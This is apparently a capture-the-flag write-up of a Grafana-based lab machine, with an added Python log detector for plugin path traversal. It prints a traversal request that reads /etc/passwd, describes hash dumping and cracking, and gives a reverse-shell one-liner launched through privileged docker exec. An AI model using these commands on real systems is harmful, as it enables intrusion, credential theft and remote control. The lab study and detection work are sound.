Platform: Hack The Box
Difficulty: Easy
IP: 10.129.238.160
Date Completed: 2025-07-25
This box explores vulnerabilities in Grafana — including directory traversal, SQLite DB leaks, salted SHA-256 password hashes, and Docker container privilege escalation.
nmap -sC -sV 10.129.238.160
Ports found:
22/tcp: OpenSSH
3000/tcp: Grafana
Directory traversal on Grafana exposed system files:
GET /public/plugins/welcome/../../../../../../../../../../../../../etc/passwd
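Detection side of the request above, as an added example (not part of the original writeup): a log check that flags dot-dot segments under /public/plugins/, including percent-encoded and double-encoded forms. It assumes a reverse proxy in front of Grafana writing common-log-format access lines; the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.4 - - [25/Jul/2025:10:01:02 +0000] "GET /public/plugins/welcome/../../../../etc/passwd HTTP/1.1" 200 1482
10.10.14.4 - - [25/Jul/2025:10:01:09 +0000] "GET /public/plugins/welcome/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1482
10.10.14.9 - - [25/Jul/2025:10:02:00 +0000] "GET /public/plugins/welcome/img/logo.svg HTTP/1.1" 200 912
10.10.14.9 - - [25/Jul/2025:10:02:03 +0000] "GET /public/plugins/text/%252e%252e%252fREADME.md HTTP/1.1" 404 0
10.10.14.9 - - [25/Jul/2025:10:02:05 +0000] "GET /api/health HTTP/1.1" 200 70
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
PLUGIN_PREFIX = "/public/plugins/"

def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_plugin_traversal(raw_path):
    """True if a plugin static-file path carries a '..' segment after decoding."""
    path = fully_decode(raw_path.split("?", 1)[0]).replace("\\", "/")
    if not path.startswith(PLUGIN_PREFIX):
        return False
    # Browsers normalise dot segments before sending, so any '..' that
    # reaches the server under the plugin prefix is worth flagging.
    return ".." in path[len(PLUGIN_PREFIX):].split("/")

def find_traversal_hits(log_text):
    """Return one dict per suspicious request found in the log text."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_plugin_traversal(m.group(2)):
            client, path, status = m.groups()
            # A 200 means file contents were probably returned: triage as a leak.
            hits.append({"client": client, "path": path, "served": status == "200"})
    return hits

if __name__ == "__main__":
    for hit in find_traversal_hits(SAMPLE_LOG):
        print(hit)
```

Hits with served set to True are the ones to treat as disclosure; here that would mean rotating every credential stored in grafana.db.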
Extracted grafana.db and dumped the user table via SQLite:
SELECT * FROM user;
Used grafana2hashcat to convert salted hashes and cracked them with hashcat -m 10900.
Logged in as boris via SSH:
ssh boris@data.htb
Got user.txt:
105d3977d1672bd473f25178xxxxx
sudo -l
(root) NOPASSWD: /snap/bin/docker exec *
Used Docker exec to escape into the container:
sudo docker exec --interactive --privileged --user root <container_id> /bin/sh -i >& /dev/tcp/10.10.14.4/4444 0>&1
Alternatively, used Penelope to catch the shell.
Got root.txt:
40fec1da153ae8450e86a4b33a9cxxxxx
User: Extract Grafana DB → Hashcat crack → SSH as boris
Root: Docker exec on privileged container → root shell